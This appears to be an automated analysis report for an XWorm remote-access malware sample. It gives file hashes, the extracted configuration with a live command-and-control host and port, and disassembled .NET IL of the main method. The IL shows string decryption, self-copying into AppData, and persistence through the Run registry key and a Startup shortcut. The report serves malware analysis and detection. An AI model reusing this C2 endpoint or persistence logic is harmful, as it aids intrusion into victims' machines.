Symbol Ofbuscation Score
|
Hash | Hash Value |
|---|---|
| MD5 | 515eddac9f486405ee522dc0da7ac766
|
| Sha1 | 687fe6b3aeaf761e72f069bfb4428604a7a07736
|
| Sha256 | e5a3a745a69ce661f65a5c3cd1d40871a3afbf6b4a27326676f70961b0e26d11
|
| Sha384 | b03a8fcd5c9ddabf2d21bd47114a4f8785c8a6379cec0f1c2ca91bccba05003b3db6bcd49afe8faa632103d11a4c08d7
|
| Sha512 | e26f9c260cf692e11729209a58eb5c640308f96b32da928cefa8b29b6d775d8dd15cc7b4a4ffd6221f52d9112bcab0914d9e23403824d819b1ac47cc850e6856
|
| SSDeep | 1536:OFWyGJ+Vi1shE40rDNfZAeE3jn62bxZiLIBH/TWhr0z6t6jcOv/3/P2dS1EAd8Is:UCfsTu12nbxMMrvcOv/33igEA6IIf
|
| TLSH | 21938D183BEA4026F1FF5FB19DF136529674B7335902991F24C91E8B3623A85CE503BA
|
PeID
|
Config. Field0 | Value |
|---|---|
| Mutex | 7ZDcrj40gm82RuB6 |
| Hosts | industrial-vegetation.gl.at.ply.gg |
| Port | 59863 |
| KEY | <123456789> |
| USBNM | <Xwormmm> |
| LoggerPath | %AppData% |
| family | xworm |
|
Name0 | Value |
|---|---|
| Info | PE Detect: PeReader OK (file layout) |
| Module Name | m9snoi.exe |
| Full Name | m9snoi.exe |
| EntryPoint | System.Void Stub.bCSxT7gTvYUCKFpR0bnD37dzk7GJZmuWudXLv3ieElWKGYwOh::hU29ySAY86j8B1WJTfGWwCLNLIjCZKjamzJjmR4OkbyeOp6KO() |
| Scope Name | m9snoi.exe |
| Scope Type | ModuleDef |
| Kind | Windows |
| Runtime Version | v4.0.30319 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | m9snoi |
| Assembly Version | 1.0.0.0 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | <null> |
| Total Strings | 295 |
| Main Method | System.Void Stub.bCSxT7gTvYUCKFpR0bnD37dzk7GJZmuWudXLv3ieElWKGYwOh::hU29ySAY86j8B1WJTfGWwCLNLIjCZKjamzJjmR4OkbyeOp6KO() |
| Main IL Instruction Count | 236 |
| Main IL | ldsfld System.Int32 cJ09sXIeNYHwNMt8WbjLYGQHDSGYZCOW4eGqx18PDxdxeW1ZR::9RfArOePM76CSyXN59Nk9MDKV1JLvbcnahjL9WbjnGeWfML0i ldc.i4 1000 mul.ovf <null> call System.Void System.Threading.Thread::Sleep(System.Int32) ldsfld System.String cJ09sXIeNYHwNMt8WbjLYGQHDSGYZCOW4eGqx18PDxdxeW1ZR::yLeCZSLPrC8bZmhJNGFxuhxYtogwLHQBe8EbMaOX2EUpuHZ9Z call System.Object Stub.CQnJQVtBA7U2BpmtFw7zyAM0PykcrVD91UyfEWNrwlLqIRYGY1nyMXL9vLU5PCr0cH0gkDTdWTdwMvbcSf::sEwpj4GC2D87wLCAKLjIm35su5L1pepmiWXuk9Ps1WrDdODwKzJ80euGfSZHM7uan78MF9D4FVAYlqx1gi(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String cJ09sXIeNYHwNMt8WbjLYGQHDSGYZCOW4eGqx18PDxdxeW1ZR::yLeCZSLPrC8bZmhJNGFxuhxYtogwLHQBe8EbMaOX2EUpuHZ9Z ldsfld System.String cJ09sXIeNYHwNMt8WbjLYGQHDSGYZCOW4eGqx18PDxdxeW1ZR::4scpueyqYe9FZwEA1B6Ocvax0InbgE8oZolDVMIcZO5vFvAq0 call System.Object Stub.CQnJQVtBA7U2BpmtFw7zyAM0PykcrVD91UyfEWNrwlLqIRYGY1nyMXL9vLU5PCr0cH0gkDTdWTdwMvbcSf::sEwpj4GC2D87wLCAKLjIm35su5L1pepmiWXuk9Ps1WrDdODwKzJ80euGfSZHM7uan78MF9D4FVAYlqx1gi(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String cJ09sXIeNYHwNMt8WbjLYGQHDSGYZCOW4eGqx18PDxdxeW1ZR::4scpueyqYe9FZwEA1B6Ocvax0InbgE8oZolDVMIcZO5vFvAq0 ldsfld System.String cJ09sXIeNYHwNMt8WbjLYGQHDSGYZCOW4eGqx18PDxdxeW1ZR::1oD03ULM7GzZagvRyrbbDsa49wGZZEVLS07JIYD65QCFd5031 call System.Object Stub.CQnJQVtBA7U2BpmtFw7zyAM0PykcrVD91UyfEWNrwlLqIRYGY1nyMXL9vLU5PCr0cH0gkDTdWTdwMvbcSf::sEwpj4GC2D87wLCAKLjIm35su5L1pepmiWXuk9Ps1WrDdODwKzJ80euGfSZHM7uan78MF9D4FVAYlqx1gi(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String cJ09sXIeNYHwNMt8WbjLYGQHDSGYZCOW4eGqx18PDxdxeW1ZR::1oD03ULM7GzZagvRyrbbDsa49wGZZEVLS07JIYD65QCFd5031 ldsfld System.String cJ09sXIeNYHwNMt8WbjLYGQHDSGYZCOW4eGqx18PDxdxeW1ZR::WvZkCv0jSybmv2STxOsztQyIkPxt1vWbGqaz791nPhyCZyHhf call System.Object Stub.CQnJQVtBA7U2BpmtFw7zyAM0PykcrVD91UyfEWNrwlLqIRYGY1nyMXL9vLU5PCr0cH0gkDTdWTdwMvbcSf::sEwpj4GC2D87wLCAKLjIm35su5L1pepmiWXuk9Ps1WrDdODwKzJ80euGfSZHM7uan78MF9D4FVAYlqx1gi(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String cJ09sXIeNYHwNMt8WbjLYGQHDSGYZCOW4eGqx18PDxdxeW1ZR::WvZkCv0jSybmv2STxOsztQyIkPxt1vWbGqaz791nPhyCZyHhf ldsfld System.String cJ09sXIeNYHwNMt8WbjLYGQHDSGYZCOW4eGqx18PDxdxeW1ZR::vvqYOwP5sdH8JSnvYzPoWIxGeCpmCNXjuCfBrQkG9W1ARf7H8 call System.Object Stub.CQnJQVtBA7U2BpmtFw7zyAM0PykcrVD91UyfEWNrwlLqIRYGY1nyMXL9vLU5PCr0cH0gkDTdWTdwMvbcSf::sEwpj4GC2D87wLCAKLjIm35su5L1pepmiWXuk9Ps1WrDdODwKzJ80euGfSZHM7uan78MF9D4FVAYlqx1gi(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String cJ09sXIeNYHwNMt8WbjLYGQHDSGYZCOW4eGqx18PDxdxeW1ZR::vvqYOwP5sdH8JSnvYzPoWIxGeCpmCNXjuCfBrQkG9W1ARf7H8 ldsfld System.String cJ09sXIeNYHwNMt8WbjLYGQHDSGYZCOW4eGqx18PDxdxeW1ZR::ddiGnt786Bo6M3QsGjtKDNeFUG3ZOYuVvbzXCtehqMVmybG0k call System.Object Stub.CQnJQVtBA7U2BpmtFw7zyAM0PykcrVD91UyfEWNrwlLqIRYGY1nyMXL9vLU5PCr0cH0gkDTdWTdwMvbcSf::sEwpj4GC2D87wLCAKLjIm35su5L1pepmiWXuk9Ps1WrDdODwKzJ80euGfSZHM7uan78MF9D4FVAYlqx1gi(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String cJ09sXIeNYHwNMt8WbjLYGQHDSGYZCOW4eGqx18PDxdxeW1ZR::ddiGnt786Bo6M3QsGjtKDNeFUG3ZOYuVvbzXCtehqMVmybG0k ldsfld System.String cJ09sXIeNYHwNMt8WbjLYGQHDSGYZCOW4eGqx18PDxdxeW1ZR::DcELFkY37yTU2ByWObmPywpnWoa8fp5EIOUspjp4qQMc34t9p call System.Object Stub.CQnJQVtBA7U2BpmtFw7zyAM0PykcrVD91UyfEWNrwlLqIRYGY1nyMXL9vLU5PCr0cH0gkDTdWTdwMvbcSf::sEwpj4GC2D87wLCAKLjIm35su5L1pepmiWXuk9Ps1WrDdODwKzJ80euGfSZHM7uan78MF9D4FVAYlqx1gi(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) call System.String System.Environment::ExpandEnvironmentVariables(System.String) stsfld System.String cJ09sXIeNYHwNMt8WbjLYGQHDSGYZCOW4eGqx18PDxdxeW1ZR::DcELFkY37yTU2ByWObmPywpnWoa8fp5EIOUspjp4qQMc34t9p ldsfld System.String cJ09sXIeNYHwNMt8WbjLYGQHDSGYZCOW4eGqx18PDxdxeW1ZR::feaaKCM3HlLbXR97QUx0nlU9Sk06MmlUKqucab41HEgvOiXyI call System.Object Stub.CQnJQVtBA7U2BpmtFw7zyAM0PykcrVD91UyfEWNrwlLqIRYGY1nyMXL9vLU5PCr0cH0gkDTdWTdwMvbcSf::sEwpj4GC2D87wLCAKLjIm35su5L1pepmiWXuk9Ps1WrDdODwKzJ80euGfSZHM7uan78MF9D4FVAYlqx1gi(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String cJ09sXIeNYHwNMt8WbjLYGQHDSGYZCOW4eGqx18PDxdxeW1ZR::feaaKCM3HlLbXR97QUx0nlU9Sk06MmlUKqucab41HEgvOiXyI leave.s IL_00CB: call System.Boolean Stub.OKMBUQEzdVwxtbCPeF6kuABBuufwlsYPrZfV7xAYzk8VulKOges5e0Ri9rLaxMVKgRdMOYS1B0Fc8SufEY::jFENvf3HCG5hHYJpacvEnp8L5zhYz6Gsk4ibJCNg8IjpUSQBBz4pjNEHlo2FDSETw9h2pPXKIREXz9pcm6() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.3 <null> ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_00CB: call System.Boolean Stub.OKMBUQEzdVwxtbCPeF6kuABBuufwlsYPrZfV7xAYzk8VulKOges5e0Ri9rLaxMVKgRdMOYS1B0Fc8SufEY::jFENvf3HCG5hHYJpacvEnp8L5zhYz6Gsk4ibJCNg8IjpUSQBBz4pjNEHlo2FDSETw9h2pPXKIREXz9pcm6() call System.Boolean Stub.OKMBUQEzdVwxtbCPeF6kuABBuufwlsYPrZfV7xAYzk8VulKOges5e0Ri9rLaxMVKgRdMOYS1B0Fc8SufEY::jFENvf3HCG5hHYJpacvEnp8L5zhYz6Gsk4ibJCNg8IjpUSQBBz4pjNEHlo2FDSETw9h2pPXKIREXz9pcm6() brtrue.s IL_00D8: call System.Void Stub.bCSxT7gTvYUCKFpR0bnD37dzk7GJZmuWudXLv3ieElWKGYwOh::3mlFBjkWoZTi0zzvlooFVWgDAs5peDsv0hH25mRgUENsHMK3l() ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) call System.Void Stub.bCSxT7gTvYUCKFpR0bnD37dzk7GJZmuWudXLv3ieElWKGYwOh::3mlFBjkWoZTi0zzvlooFVWgDAs5peDsv0hH25mRgUENsHMK3l() leave.s IL_00EE: call System.Void Stub.bCSxT7gTvYUCKFpR0bnD37dzk7GJZmuWudXLv3ieElWKGYwOh::O7FB8E7eYln6BbgBRYifZ6bnOal8z0o9yPziMRUgUS58io7hk() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_4 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_00EE: call System.Void Stub.bCSxT7gTvYUCKFpR0bnD37dzk7GJZmuWudXLv3ieElWKGYwOh::O7FB8E7eYln6BbgBRYifZ6bnOal8z0o9yPziMRUgUS58io7hk() call System.Void Stub.bCSxT7gTvYUCKFpR0bnD37dzk7GJZmuWudXLv3ieElWKGYwOh::O7FB8E7eYln6BbgBRYifZ6bnOal8z0o9yPziMRUgUS58io7hk() ldsfld System.String cJ09sXIeNYHwNMt8WbjLYGQHDSGYZCOW4eGqx18PDxdxeW1ZR::DcELFkY37yTU2ByWObmPywpnWoa8fp5EIOUspjp4qQMc34t9p ldstr \ ldsfld System.String cJ09sXIeNYHwNMt8WbjLYGQHDSGYZCOW4eGqx18PDxdxeW1ZR::feaaKCM3HlLbXR97QUx0nlU9Sk06MmlUKqucab41HEgvOiXyI call System.String System.String::Concat(System.String,System.String,System.String) stloc.0 <null> ldloc.0 <null> newobj System.Void System.IO.FileInfo::.ctor(System.String) callvirt System.IO.DirectoryInfo System.IO.FileInfo::get_Directory() callvirt System.String System.IO.DirectoryInfo::get_FullName() stloc.s V_5 ldloc.s V_5 call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) call System.Boolean System.IO.Directory::Exists(System.String) brtrue.s IL_0135: ldloc.0 ldloc.s V_5 call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) call System.IO.DirectoryInfo System.IO.Directory::CreateDirectory(System.String) pop <null> ldloc.0 <null> call System.Boolean System.IO.File::Exists(System.String) brfalse.s IL_014C: ldc.i4 1000 ldloc.0 <null> newobj System.Void System.IO.FileInfo::.ctor(System.String) stloc.s V_6 ldloc.s V_6 callvirt System.Void System.IO.FileInfo::Delete() ldc.i4 1000 call System.Void System.Threading.Thread::Sleep(System.Int32) ldloc.0 <null> ldsfld System.String Stub.OKMBUQEzdVwxtbCPeF6kuABBuufwlsYPrZfV7xAYzk8VulKOges5e0Ri9rLaxMVKgRdMOYS1B0Fc8SufEY::xk4x03sShaQJhD9CHihnc7o1m6yBr1KvG4Vbw5Yh4EWvWUNFxL8kkGt3dTFneJAGFuMgGXlu56FUUasXNh call System.Byte[] System.IO.File::ReadAllBytes(System.String) call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) leave.s IL_0177: call My.WaANjR9ICPtzOcua5 My.mihIJ03wLdnJstRyY::b9gui9e4oxyXdlwjRzTIYPjUrAckWjvGla29DRYPJGNlEqUUP() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_7 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_0177: call My.WaANjR9ICPtzOcua5 My.mihIJ03wLdnJstRyY::b9gui9e4oxyXdlwjRzTIYPjUrAckWjvGla29DRYPJGNlEqUUP() call My.WaANjR9ICPtzOcua5 My.mihIJ03wLdnJstRyY::b9gui9e4oxyXdlwjRzTIYPjUrAckWjvGla29DRYPJGNlEqUUP() callvirt Microsoft.VisualBasic.MyServices.RegistryProxy Microsoft.VisualBasic.Devices.ServerComputer::get_Registry() callvirt Microsoft.Win32.RegistryKey Microsoft.VisualBasic.MyServices.RegistryProxy::get_CurrentUser() ldstr SOFTWARE\Microsoft\Windows\CurrentVersion\Run ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) ldsfld System.String cJ09sXIeNYHwNMt8WbjLYGQHDSGYZCOW4eGqx18PDxdxeW1ZR::feaaKCM3HlLbXR97QUx0nlU9Sk06MmlUKqucab41HEgvOiXyI call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) ldloc.0 <null> callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object) leave.s IL_01B2: ldc.i4.7 dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_8 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_01B2: ldc.i4.7 ldc.i4.7 <null> call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) ldstr \ ldsfld System.String cJ09sXIeNYHwNMt8WbjLYGQHDSGYZCOW4eGqx18PDxdxeW1ZR::feaaKCM3HlLbXR97QUx0nlU9Sk06MmlUKqucab41HEgvOiXyI call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) ldstr .lnk call System.String System.String::Concat(System.String,System.String,System.String,System.String) stloc.s V_9 ldstr WScript.Shell ldstr call System.Object Microsoft.VisualBasic.Interaction::CreateObject(System.String,System.String) ldnull <null> ldstr CreateShortcut ldc.i4.1 <null> newarr System.Object stloc.s V_11 ldloc.s V_11 ldc.i4.0 <null> ldloc.s V_9 stelem.ref <null> ldloc.s V_11 stloc.s V_12 ldloc.s V_12 ldnull <null> ldnull <null> ldc.i4.1 <null> newarr System.Boolean stloc.s V_13 ldloc.s V_13 ldc.i4.0 <null> ldc.i4.1 <null> stelem.i1 <null> ldloc.s V_13 call System.Object Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateGet(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean[]) ldloc.s V_13 ldc.i4.0 <null> ldelem.i1 <null> brfalse.s IL_0237: stloc.s V_14 ldloc.s V_12 ldc.i4.0 <null> ldelem.ref <null> call System.Object System.Runtime.CompilerServices.RuntimeHelpers::GetObjectValue(System.Object) ldtoken System.String call System.Type System.Type::GetTypeFromHandle(System.RuntimeTypeHandle) call System.Object Microsoft.VisualBasic.CompilerServices.Conversions::ChangeType(System.Object,System.Type) castclass System.String stloc.s V_9 stloc.s V_14 ldloc.s V_14 ldnull <null> ldstr TargetPath ldc.i4.1 <null> newarr System.Object stloc.s V_15 ldloc.s V_15 ldc.i4.0 <null> ldloc.0 <null> stelem.ref <null> ldloc.s V_15 ldnull <null> ldnull <null> ldc.i4.0 <null> ldc.i4.1 <null> call System.Void Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateSetComplex(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean,System.Boolean) ldloc.s V_14 ldnull <null> ldstr WorkingDirectory ldc.i4.1 <null> newarr System.Object stloc.s V_15 ldloc.s V_15 ldc.i4.0 <null> ldstr stelem.ref <null> ldloc.s V_15 ldnull <null> ldnull <null> ldc.i4.0 <null> ldc.i4.1 <null> call System.Void Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateSetComplex(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean,System.Boolean) ldloc.s V_14 ldnull <null> ldstr Save ldc.i4.0 <null> newarr System.Object ldnull <null> ldnull <null> ldnull <null> ldc.i4.1 <null> call System.Object Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateCall(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean[],System.Boolean) pop <null> ldnull <null> stloc.s V_14 ldloc.s V_9 ldc.i4.3 <null> newobj System.Void System.IO.FileStream::.ctor(System.String,System.IO.FileMode) stsfld System.IO.FileStream Stub.OKMBUQEzdVwxtbCPeF6kuABBuufwlsYPrZfV7xAYzk8VulKOges5e0Ri9rLaxMVKgRdMOYS1B0Fc8SufEY::nw35b3R4FyiRtISPL8ustsD82ufpNQPS1gCnGbzCfHtwN5JDzKJeNPe6DGt0P2xokEHDNlGowqT7QQPmam leave.s IL_02B6: call System.Void Stub.OKMBUQEzdVwxtbCPeF6kuABBuufwlsYPrZfV7xAYzk8VulKOges5e0Ri9rLaxMVKgRdMOYS1B0Fc8SufEY::fOf6HZGqyWaEBglWf9Ws8PERSzsXmFBqyKjFBfRTIY6cQEfsiGTh6TMhacymmKjz3dp4GzPFEw1WkelGqF() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_10 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_02B6: call System.Void Stub.OKMBUQEzdVwxtbCPeF6kuABBuufwlsYPrZfV7xAYzk8VulKOges5e0Ri9rLaxMVKgRdMOYS1B0Fc8SufEY::fOf6HZGqyWaEBglWf9Ws8PERSzsXmFBqyKjFBfRTIY6cQEfsiGTh6TMhacymmKjz3dp4GzPFEw1WkelGqF() call System.Void Stub.OKMBUQEzdVwxtbCPeF6kuABBuufwlsYPrZfV7xAYzk8VulKOges5e0Ri9rLaxMVKgRdMOYS1B0Fc8SufEY::fOf6HZGqyWaEBglWf9Ws8PERSzsXmFBqyKjFBfRTIY6cQEfsiGTh6TMhacymmKjz3dp4GzPFEw1WkelGqF() call System.String Stub.o7K3DNlY1e4PBATzU5GLcIrXuMHmWfKFcQCfvsazBMD7oeMvE::aFQhSya8vWl6rYdUpqnanDdhvDEPbSuKUaqwvCNi8xmG8S1Fo() call System.Boolean Microsoft.VisualBasic.CompilerServices.Conversions::ToBoolean(System.String) brfalse.s IL_02CC: ldnull call System.Void Stub.6qABNm9Eawkj2BTTuA0lQIOfzTUdWEsky8HVK7L8eImzXKmGaBItcyCaMAko4f1p3gECYbmlNLwFbgM2g2::xqLvPK5CEjnS01Qzd0Rrgezd0HBK1FGNWzeDywiWAdDNlqjFoodqzKUrSv7Gt3tiwl716XctsAfNfi4KuX() ldnull <null> ldftn System.Void Stub.bCSxT7gTvYUCKFpR0bnD37dzk7GJZmuWudXLv3ieElWKGYwOh::J2mzC5K0QoGQ11wLKr3G0A5dU71hKAQNqTF1AeHHgcbG0Zpod() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) stloc.1 <null> ldnull <null> ldftn System.Void Stub.bCSxT7gTvYUCKFpR0bnD37dzk7GJZmuWudXLv3ieElWKGYwOh::CT50g2TdzvGpuE5w3YtollVaet9dtA5FOiulYNMmuvKVLkZye() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) stloc.2 <null> ldloc.1 <null> callvirt System.Void System.Threading.Thread::Start() ldloc.2 <null> callvirt System.Void System.Threading.Thread::Start() ldloc.2 <null> callvirt System.Void System.Threading.Thread::Join() ret <null> |
| Module Name | m9snoi.exe |
| Full Name | m9snoi.exe |
| EntryPoint | System.Void Stub.bCSxT7gTvYUCKFpR0bnD37dzk7GJZmuWudXLv3ieElWKGYwOh::hU29ySAY86j8B1WJTfGWwCLNLIjCZKjamzJjmR4OkbyeOp6KO() |
| Scope Name | m9snoi.exe |
| Scope Type | ModuleDef |
| Kind | Windows |
| Runtime Version | v4.0.30319 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | m9snoi |
| Assembly Version | 1.0.0.0 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | <null> |
| Total Strings | 295 |
| Main Method | System.Void Stub.bCSxT7gTvYUCKFpR0bnD37dzk7GJZmuWudXLv3ieElWKGYwOh::hU29ySAY86j8B1WJTfGWwCLNLIjCZKjamzJjmR4OkbyeOp6KO() |
| Main IL Instruction Count | 236 |
| Main IL | ldsfld System.Int32 cJ09sXIeNYHwNMt8WbjLYGQHDSGYZCOW4eGqx18PDxdxeW1ZR::9RfArOePM76CSyXN59Nk9MDKV1JLvbcnahjL9WbjnGeWfML0i ldc.i4 1000 mul.ovf <null> call System.Void System.Threading.Thread::Sleep(System.Int32) ldsfld System.String cJ09sXIeNYHwNMt8WbjLYGQHDSGYZCOW4eGqx18PDxdxeW1ZR::yLeCZSLPrC8bZmhJNGFxuhxYtogwLHQBe8EbMaOX2EUpuHZ9Z call System.Object Stub.CQnJQVtBA7U2BpmtFw7zyAM0PykcrVD91UyfEWNrwlLqIRYGY1nyMXL9vLU5PCr0cH0gkDTdWTdwMvbcSf::sEwpj4GC2D87wLCAKLjIm35su5L1pepmiWXuk9Ps1WrDdODwKzJ80euGfSZHM7uan78MF9D4FVAYlqx1gi(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String cJ09sXIeNYHwNMt8WbjLYGQHDSGYZCOW4eGqx18PDxdxeW1ZR::yLeCZSLPrC8bZmhJNGFxuhxYtogwLHQBe8EbMaOX2EUpuHZ9Z ldsfld System.String cJ09sXIeNYHwNMt8WbjLYGQHDSGYZCOW4eGqx18PDxdxeW1ZR::4scpueyqYe9FZwEA1B6Ocvax0InbgE8oZolDVMIcZO5vFvAq0 call System.Object Stub.CQnJQVtBA7U2BpmtFw7zyAM0PykcrVD91UyfEWNrwlLqIRYGY1nyMXL9vLU5PCr0cH0gkDTdWTdwMvbcSf::sEwpj4GC2D87wLCAKLjIm35su5L1pepmiWXuk9Ps1WrDdODwKzJ80euGfSZHM7uan78MF9D4FVAYlqx1gi(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String cJ09sXIeNYHwNMt8WbjLYGQHDSGYZCOW4eGqx18PDxdxeW1ZR::4scpueyqYe9FZwEA1B6Ocvax0InbgE8oZolDVMIcZO5vFvAq0 ldsfld System.String cJ09sXIeNYHwNMt8WbjLYGQHDSGYZCOW4eGqx18PDxdxeW1ZR::1oD03ULM7GzZagvRyrbbDsa49wGZZEVLS07JIYD65QCFd5031 call System.Object Stub.CQnJQVtBA7U2BpmtFw7zyAM0PykcrVD91UyfEWNrwlLqIRYGY1nyMXL9vLU5PCr0cH0gkDTdWTdwMvbcSf::sEwpj4GC2D87wLCAKLjIm35su5L1pepmiWXuk9Ps1WrDdODwKzJ80euGfSZHM7uan78MF9D4FVAYlqx1gi(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String cJ09sXIeNYHwNMt8WbjLYGQHDSGYZCOW4eGqx18PDxdxeW1ZR::1oD03ULM7GzZagvRyrbbDsa49wGZZEVLS07JIYD65QCFd5031 ldsfld System.String cJ09sXIeNYHwNMt8WbjLYGQHDSGYZCOW4eGqx18PDxdxeW1ZR::WvZkCv0jSybmv2STxOsztQyIkPxt1vWbGqaz791nPhyCZyHhf call System.Object Stub.CQnJQVtBA7U2BpmtFw7zyAM0PykcrVD91UyfEWNrwlLqIRYGY1nyMXL9vLU5PCr0cH0gkDTdWTdwMvbcSf::sEwpj4GC2D87wLCAKLjIm35su5L1pepmiWXuk9Ps1WrDdODwKzJ80euGfSZHM7uan78MF9D4FVAYlqx1gi(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String cJ09sXIeNYHwNMt8WbjLYGQHDSGYZCOW4eGqx18PDxdxeW1ZR::WvZkCv0jSybmv2STxOsztQyIkPxt1vWbGqaz791nPhyCZyHhf ldsfld System.String cJ09sXIeNYHwNMt8WbjLYGQHDSGYZCOW4eGqx18PDxdxeW1ZR::vvqYOwP5sdH8JSnvYzPoWIxGeCpmCNXjuCfBrQkG9W1ARf7H8 call System.Object Stub.CQnJQVtBA7U2BpmtFw7zyAM0PykcrVD91UyfEWNrwlLqIRYGY1nyMXL9vLU5PCr0cH0gkDTdWTdwMvbcSf::sEwpj4GC2D87wLCAKLjIm35su5L1pepmiWXuk9Ps1WrDdODwKzJ80euGfSZHM7uan78MF9D4FVAYlqx1gi(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String cJ09sXIeNYHwNMt8WbjLYGQHDSGYZCOW4eGqx18PDxdxeW1ZR::vvqYOwP5sdH8JSnvYzPoWIxGeCpmCNXjuCfBrQkG9W1ARf7H8 ldsfld System.String cJ09sXIeNYHwNMt8WbjLYGQHDSGYZCOW4eGqx18PDxdxeW1ZR::ddiGnt786Bo6M3QsGjtKDNeFUG3ZOYuVvbzXCtehqMVmybG0k call System.Object Stub.CQnJQVtBA7U2BpmtFw7zyAM0PykcrVD91UyfEWNrwlLqIRYGY1nyMXL9vLU5PCr0cH0gkDTdWTdwMvbcSf::sEwpj4GC2D87wLCAKLjIm35su5L1pepmiWXuk9Ps1WrDdODwKzJ80euGfSZHM7uan78MF9D4FVAYlqx1gi(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String cJ09sXIeNYHwNMt8WbjLYGQHDSGYZCOW4eGqx18PDxdxeW1ZR::ddiGnt786Bo6M3QsGjtKDNeFUG3ZOYuVvbzXCtehqMVmybG0k ldsfld System.String cJ09sXIeNYHwNMt8WbjLYGQHDSGYZCOW4eGqx18PDxdxeW1ZR::DcELFkY37yTU2ByWObmPywpnWoa8fp5EIOUspjp4qQMc34t9p call System.Object Stub.CQnJQVtBA7U2BpmtFw7zyAM0PykcrVD91UyfEWNrwlLqIRYGY1nyMXL9vLU5PCr0cH0gkDTdWTdwMvbcSf::sEwpj4GC2D87wLCAKLjIm35su5L1pepmiWXuk9Ps1WrDdODwKzJ80euGfSZHM7uan78MF9D4FVAYlqx1gi(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) call System.String System.Environment::ExpandEnvironmentVariables(System.String) stsfld System.String cJ09sXIeNYHwNMt8WbjLYGQHDSGYZCOW4eGqx18PDxdxeW1ZR::DcELFkY37yTU2ByWObmPywpnWoa8fp5EIOUspjp4qQMc34t9p ldsfld System.String cJ09sXIeNYHwNMt8WbjLYGQHDSGYZCOW4eGqx18PDxdxeW1ZR::feaaKCM3HlLbXR97QUx0nlU9Sk06MmlUKqucab41HEgvOiXyI call System.Object Stub.CQnJQVtBA7U2BpmtFw7zyAM0PykcrVD91UyfEWNrwlLqIRYGY1nyMXL9vLU5PCr0cH0gkDTdWTdwMvbcSf::sEwpj4GC2D87wLCAKLjIm35su5L1pepmiWXuk9Ps1WrDdODwKzJ80euGfSZHM7uan78MF9D4FVAYlqx1gi(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String cJ09sXIeNYHwNMt8WbjLYGQHDSGYZCOW4eGqx18PDxdxeW1ZR::feaaKCM3HlLbXR97QUx0nlU9Sk06MmlUKqucab41HEgvOiXyI leave.s IL_00CB: call System.Boolean 